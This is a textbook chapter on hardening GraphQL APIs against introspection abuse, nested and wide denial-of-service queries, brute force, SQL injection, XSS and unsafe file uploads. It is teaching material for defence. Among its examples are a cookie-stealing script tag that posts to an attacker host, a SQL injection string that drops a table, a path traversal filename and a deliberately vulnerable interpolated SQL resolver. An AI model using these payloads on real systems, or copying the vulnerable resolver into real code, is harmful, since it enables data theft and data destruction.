

## **Chapter 12: Security Hardening**

---

## **Learning Objectives**

By the end of this chapter, you will be able to:

- Secure your GraphQL schema by disabling introspection in production environments
- Implement query depth limiting to prevent nested query attacks
- Configure query complexity analysis to prevent Denial of Service (DoS)
- Set up rate limiting for GraphQL operations
- Implement Persisted Queries (Trusted Documents) to prevent arbitrary query execution
- Protect against SQL Injection and XSS in resolvers
- Understand the security implications of file uploads in GraphQL
- Audit and secure your GraphQL API against common attack vectors

---

## **Prerequisites**

- Completed Chapter 7: Building a GraphQL Server
- Completed Chapter 9: Authentication and Authorization
- Understanding of common web security vulnerabilities (OWASP Top 10)
- Familiarity with HTTP middleware concepts

---

## **12.1 Understanding the Attack Surface**

GraphQL APIs have a unique attack surface compared to REST APIs. While REST endpoints are fixed and predictable, GraphQL allows clients to construct arbitrary queries. This flexibility creates specific vulnerabilities:

1. **Introspection Discovery**: Attackers can discover your entire schema structure
2. **Deep Recursion**: Nested queries can cause stack overflows or database timeouts
3. **Resource Exhaustion**: Expensive queries can crash your server (DoS)
4. **Injection Attacks**: Malicious input in variables can leak data

We will address each of these systematically.

---

## **12.2 Introspection: Disabling in Production**

GraphQL Introspection is the ability to query the schema itself (using `__schema`, `__type`, etc.). Tools like GraphiQL and Apollo Studio rely on this for auto-completion and documentation.

**The Risk:** In production, introspection allows attackers to discover your entire API structure, field names, relationships, and deprecated fields. This is reconnaissance gold for attackers.

### **Implementation**

**Apollo Server Configuration:**

```javascript
const { ApolloServer } = require('apollo-server');

const server = new ApolloServer({
  typeDefs,
  resolvers,
  
  // Disable introspection in production
  introspection: process.env.NODE_ENV !== 'production',
  
  // Also disable the playground in production
  playground: process.env.NODE_ENV !== 'production',
});
```

**Alternative: Using Validation Rules**

If you need more granular control (e.g., allowing introspection only for authenticated admins):

```javascript
const { NoIntrospection } = require('graphql-disable-introspection');

const server = new ApolloServer({
  typeDefs,
  resolvers,
  validationRules: [
    // Conditionally disable introspection
    (context) => {
      if (process.env.NODE_ENV === 'production' && !context.user?.isAdmin) {
        return new NoIntrospection();
      }
      return null;
    }
  ]
});
```

**Best Practice:** Always disable introspection in production unless you have a specific use case (like a public API with open documentation). If you must keep it enabled, restrict it to authenticated users with admin privileges.

---

## **12.3 Query Depth Limiting**

Attackers can craft deeply nested queries that cause stack overflows or timeouts. For example:

```graphql
query DeepAttack {
  users {
    friends {
      friends {
        friends {
          friends {
            friends {
              name
            }
          }
        }
      }
    }
  }
}
```

If each user has 10 friends, this query attempts to fetch $10^5 = 100,000$ objects.

### **Implementation**

Using `graphql-depth-limit`:

```javascript
const depthLimit = require('graphql-depth-limit');
const { ApolloServer } = require('apollo-server');

const server = new ApolloServer({
  typeDefs,
  resolvers,
  validationRules: [
    // Limit query depth to 10 levels
    depthLimit(10, { 
      ignore: [/_trusted$/], // Optional: ignore fields ending with _trusted
      onComplete: (depth) => {
        console.log(`Query depth: ${depth}`);
      }
    })
  ]
});
```

**Configuration Options:**

*   **Max Depth**: Set based on your legitimate use cases. If your deepest legitimate query is 5 levels deep, set the limit to 7-8 to allow some flexibility.
*   **Ignored Fields**: Some fields (like `__typename` or pagination cursors) don't actually recurse. You can exclude them from depth calculations.

**Client Error Example:**

```json
{
  "errors": [
    {
      "message": "'users' exceeds maximum operation depth of 10",
      "extensions": { "code": "DEPTH_LIMIT_EXCEEDED" }
    }
  ]
}
```

---

## **12.4 Query Complexity Limiting (DoS Prevention)**

Depth alone isn't enough. A query can be wide (many fields at the same level) rather than deep:

```graphql
query WideAttack {
  users(first: 10000) {
    name
    email
    phone
    address
    friends(first: 10000) {
      name
      email
      phone
      address
    }
  }
}
```

This query is only 3 levels deep but requests 100 million potential records.

### **Implementation**

Using `graphql-query-complexity`:

```javascript
const { createComplexityLimitRule } = require('graphql-query-complexity');
const { simpleEstimator, fieldExtensionsEstimator } = require('graphql-query-complexity');

const MAX_COMPLEXITY = 1000; // Adjust based on your capacity

const server = new ApolloServer({
  typeDefs,
  resolvers,
  validationRules: [
    createComplexityLimitRule(MAX_COMPLEXITY, {
      // Estimators calculate complexity
      estimators: [
        // Use complexity defined in field extensions first
        fieldExtensionsEstimator(),
        
        // Fallback: each field costs 1 point
        simpleEstimator({ defaultComplexity: 1 })
      ],
      
      // Callback when complexity is calculated
      onComplete: (complexity) => {
        console.log(`Query complexity: ${complexity}`);
      },
      
      // Format error message
      formatErrorMessage: (cost) => 
        `Query too complex: ${cost}. Maximum allowed complexity: ${MAX_COMPLEXITY}`
    })
  ]
});
```

### **Defining Field Complexity**

You must tell the estimator which fields are expensive:

```javascript
const resolvers = {
  Query: {
    users: {
      resolve: () => db.getUsers(),
      extensions: {
        complexity: ({ args, childComplexity }) => {
          // Base cost 10 + (limit * child complexity)
          const limit = args.first || 10;
          return 10 + limit * childComplexity;
        }
      }
    }
  },
  
  User: {
    friends: {
      resolve: (user) => db.getFriends(user.id),
      extensions: {
        complexity: ({ args, childComplexity }) => {
          // Friends are expensive to fetch
          const limit = args.first || 10;
          return 5 + limit * childComplexity;
        }
      }
    },
    
    // Simple fields cost 1 (handled by default)
    name: { resolve: (user) => user.name }
  }
};
```

**Calculating Complexity:**
*   `users(first: 10)` with child complexity 5 = $10 + (10 \times 5) = 60$
*   If `User.friends` has complexity 5 and `Friend.name` has complexity 1, a query fetching 10 users with 10 friends each costs: $10 + 10 \times (5 + 10 \times 1) = 160$

---

## **12.5 Rate Limiting GraphQL Operations**

Even with complexity limits, you need to limit how often a client can make requests to prevent brute force attacks or API abuse.

### **Implementation**

Using `graphql-rate-limit`:

```javascript
const { createRateLimitRule } = require('graphql-rate-limit');
const { shield } = require('graphql-shield');

// Create rate limit rule: 10 requests per minute per user/IP
const rateLimit = createRateLimitRule({
  identifyContext: (ctx) => ctx.user?.id || ctx.req.ip,
  formatError: () => 'Too many requests. Please try again later.',
});

// Apply to schema using GraphQL Shield
const permissions = shield({
  Query: {
    // Limit expensive queries strictly
    users: rateLimit({ window: '1m', max: 10 }),
    search: rateLimit({ window: '1m', max: 5 }),
    
    // Allow more frequent access to cheap queries
    me: rateLimit({ window: '1m', max: 60 }),
  },
  Mutation: {
    login: rateLimit({ window: '15m', max: 5 }), // Prevent brute force
    createUser: rateLimit({ window: '1h', max: 10 }),
  }
});
```

**Key Configuration:**

*   **Identity Function**: Distinguish between users (by user ID) and anonymous clients (by IP address).
*   **Window**: Time window for counting requests (e.g., '1m', '1h').
*   **Max**: Maximum requests allowed in that window.
*   **Storage**: Use Redis in production for distributed rate limiting across multiple server instances.

**Redis-backed Rate Limiting:**

```javascript
const { RateLimiterRedis } = require('rate-limiter-flexible');
const Redis = require('ioredis');

const redisClient = new Redis({ host: 'redis' });

const rateLimiter = new RateLimiterRedis({
  storeClient: redisClient,
  keyPrefix: 'graphql_limit',
  points: 10, // 10 requests
  duration: 60, // per 60 seconds
});

// Middleware to check rate limit
const rateLimitMiddleware = async (req, res, next) => {
  const key = req.user?.id || req.ip;
  
  try {
    await rateLimiter.consume(key);
    next();
  } catch (rejRes) {
    res.status(429).send('Too Many Requests');
  }
};
```

---

## **12.6 Persisted Queries and Trusted Documents**

**Persisted Queries** (also called **Trusted Documents** or **Allow Lists**) solve a critical security issue: arbitrary query execution.

By default, GraphQL servers accept any valid query string. Persisted Queries flip this model: the server only accepts specific, pre-registered queries.

### **12.6.1 What are Persisted Queries?**

1.  **Development**: Client extracts all GraphQL queries from the codebase.
2.  **Build**: Client generates unique hashes (SHA-256) for each query.
3.  **Registration**: Client sends the full query strings to the server, which stores them in a database (query ID â†’ query string).
4.  **Production**: Client only sends the hash (ID), not the full query string.
5.  **Execution**: Server looks up the query by hash, rejects unknown hashes.

**Benefits:**
*   **Security**: Attackers cannot execute arbitrary queriesâ€”only pre-approved ones.
*   **Performance**: Reduced payload size (sending hash instead of full query).
*   **Caching**: CDN can cache responses keyed by hash.

### **12.6.2 Implementation with Apollo**

**Automatic Persisted Queries (APQ):**

Apollo supports a hybrid approach called APQ. If the server doesn't recognize the hash, the client sends the full query, and the server stores it for future requests.

**Server Setup:**

```javascript
const { ApolloServer, APQCache } = require('apollo-server');
const { RedisCache } = require('apollo-server-cache-redis');

const server = new ApolloServer({
  typeDefs,
  resolvers,
  
  // Enable APQ with Redis cache
  persistedQueries: {
    cache: new RedisCache({
      host: 'redis-server',
    }),
    // Optional: Disable APQ in development if needed
    ttl: 86400, // 24 hours
  },
});
```

**Strict Mode (Production Only):**

For maximum security, disable the "store if not found" behavior:

```javascript
const { ApolloServer } = require('apollo-server');

const ALLOWED_QUERY_IDS = new Set([
  'a1b2c3...', // Hash of query 1
  'd4e5f6...', // Hash of query 2
  // ... pre-computed hashes from your client build
]);

const server = new ApolloServer({
  typeDefs,
  resolvers,
  persistedQueries: {
    // Only allow specific queries
    cache: {
      async get(key) {
        if (ALLOWED_QUERY_IDS.has(key)) {
          // Return the full query string from your database
          return db.getQueryByHash(key);
        }
        return undefined;
      },
      async set(key, value) {
        // Do nothing - don't store new queries in production
        return;
      }
    }
  }
});
```

**Client Setup (Apollo Client):**

```javascript
import { ApolloClient, InMemoryCache, createPersistedQueryLink } from '@apollo/client';
import { HttpLink } from '@apollo/client/link/http';

const link = createPersistedQueryLink({
  sha256: async (query) => {
    // Use crypto to hash the query
    const encoder = new TextEncoder();
    const data = encoder.encode(query);
    const hashBuffer = await crypto.subtle.digest('SHA-256', data);
    const hashArray = Array.from(new Uint8Array(hashBuffer));
    return hashArray.map(b => b.toString(16).padStart(2, '0')).join('');
  }
}).concat(new HttpLink({ uri: '/graphql' }));

const client = new ApolloClient({
  cache: new InMemoryCache(),
  link,
});
```

---

## **12.7 SQL Injection and XSS Prevention in Resolvers**

GraphQL itself doesn't prevent injection attacksâ€”you must sanitize inputs in your resolvers just like in REST APIs.

### **SQL Injection Prevention**

**Vulnerable Code:**

```javascript
const resolvers = {
  Query: {
    searchUsers: (_, { name }) => {
      // DANGEROUS: String interpolation in SQL
      return db.query(`SELECT * FROM users WHERE name LIKE '%${name}%'`);
    }
  }
};
```

**Attack Query:**

```graphql
query {
  searchUsers(name: "'; DROP TABLE users; --")
}
```

**Secure Code:**

```javascript
const resolvers = {
  Query: {
    searchUsers: (_, { name }) => {
      // SAFE: Use parameterized queries
      return db.query('SELECT * FROM users WHERE name LIKE ?', [`%${name}%`]);
    }
  }
};
```

**Best Practices:**
*   Always use parameterized queries (prepared statements).
*   Use ORMs (Prisma, Sequelize) that automatically escape inputs.
*   Validate input using libraries like `validator` or `joi` before database operations.

### **XSS (Cross-Site Scripting) Prevention**

If your GraphQL API stores user-generated content that is later rendered in HTML (e.g., comments, posts), you must sanitize outputs.

**Vulnerable Resolver:**

```javascript
const resolvers = {
  Mutation: {
    createComment: (_, { text }) => {
      // Storing raw HTML/JS
      return db.comments.create({ text });
    }
  }
};
```

**Attack Input:**

```javascript
<script>fetch('https://attacker.com/steal?cookie=' + document.cookie)</script>
```

**Secure Implementation:**

```javascript
const DOMPurify = require('isomorphic-dompurify');

const resolvers = {
  Mutation: {
    createComment: (_, { text }) => {
      // Sanitize HTML input
      const cleanText = DOMPurify.sanitize(text, { 
        ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a'],
        ALLOWED_ATTR: ['href']
      });
      
      return db.comments.create({ text: cleanText });
    }
  }
};
```

**Alternatively:** Store raw text and escape on output in the client (React automatically escapes JSX, but raw HTML insertion is dangerous).

---

## **12.8 File Upload Security**

GraphQL supports file uploads via the `multipart/form-data` spec (using `graphql-upload`). This opens security risks:

**Risks:**
*   **Malware Upload**: Executables disguised as images.
*   **Size Attacks**: Multi-gigabyte uploads exhausting disk space.
*   **Path Traversal**: Filenames like `../../../etc/passwd`.

**Secure Implementation:**

```javascript
const { ApolloServer } = require('apollo-server');
const { graphqlUploadExpress } = require('graphql-upload');

const server = new ApolloServer({
  typeDefs,
  resolvers,
  uploads: false, // Disable default, use middleware instead
});

// Express middleware for uploads
app.use(
  '/graphql',
  graphqlUploadExpress({
    maxFileSize: 10000000, // 10 MB
    maxFiles: 10,
  })
);

// Resolver validation
const resolvers = {
  Mutation: {
    uploadAvatar: async (_, { file }, context) => {
      const { createReadStream, filename, mimetype } = await file;
      
      // 1. Validate MIME type
      const allowedTypes = ['image/jpeg', 'image/png', 'image/webp'];
      if (!allowedTypes.includes(mimetype)) {
        throw new Error('Invalid file type. Only images allowed.');
      }
      
      // 2. Validate extension
      const ext = path.extname(filename).toLowerCase();
      if (!['.jpg', '.jpeg', '.png', '.webp'].includes(ext)) {
        throw new Error('Invalid file extension.');
      }
      
      // 3. Sanitize filename (prevent path traversal)
      const sanitizedName = `${uuidv4()}${ext}`;
      const filepath = path.join(__dirname, 'uploads', sanitizedName);
      
      // 4. Stream to storage (don't buffer entire file in memory)
      const stream = createReadStream();
      await pipeline(stream, fs.createWriteStream(filepath));
      
      // 5. Optional: Scan with antivirus (ClamAV)
      // await scanFile(filepath);
      
      return { url: `/uploads/${sanitizedName}` };
    }
  }
};
```

---

## **Chapter Summary**

Security is not a feature; it is a continuous process. This chapter covered the essential defenses for production GraphQL APIs.

### **Key Takeaways:**

1.  **Introspection**: Disable in production to prevent schema discovery, or restrict to authenticated admins.
2.  **Depth Limiting**: Prevent deep recursion attacks using `graphql-depth-limit`.
3.  **Complexity Analysis**: Calculate and limit query cost to prevent resource exhaustion (DoS).
4.  **Rate Limiting**: Restrict request frequency by user/IP to prevent brute force and abuse.
5.  **Persisted Queries**: Use Trusted Documents (Allow Lists) in production to prevent arbitrary query execution. Only pre-approved queries are executable.
6.  **Injection Prevention**: Always use parameterized queries for SQL and sanitize HTML to prevent XSS.
7.  **File Uploads**: Validate MIME types, extensions, sanitize filenames, limit size, and scan for malware.

### **Security Checklist for Production:**

- [ ] Introspection disabled or restricted
- [ ] Query depth limited (e.g., max 10)
- [ ] Query complexity limited (e.g., max 1000)
- [ ] Rate limiting implemented (Redis-backed)
- [ ] Persisted Queries enabled (strict mode)
- [ ] SQL injection prevented (parameterized queries)
- [ ] XSS prevented (input sanitization)
- [ ] File uploads validated and sanitized
- [ ] HTTPS enforced
- [ ] Error messages don't leak sensitive info

---

### **ðŸš€ Next Up: Chapter 13 - Monitoring and Observability**

**Summary:** A secure and performant system is only useful if you can see what's happening inside it. In Chapter 13, we will explore monitoring and observability. You will learn how to implement structured logging, trace resolver execution times, integrate with Apollo Studio for schema monitoring, and set up alerts for when things go wrong.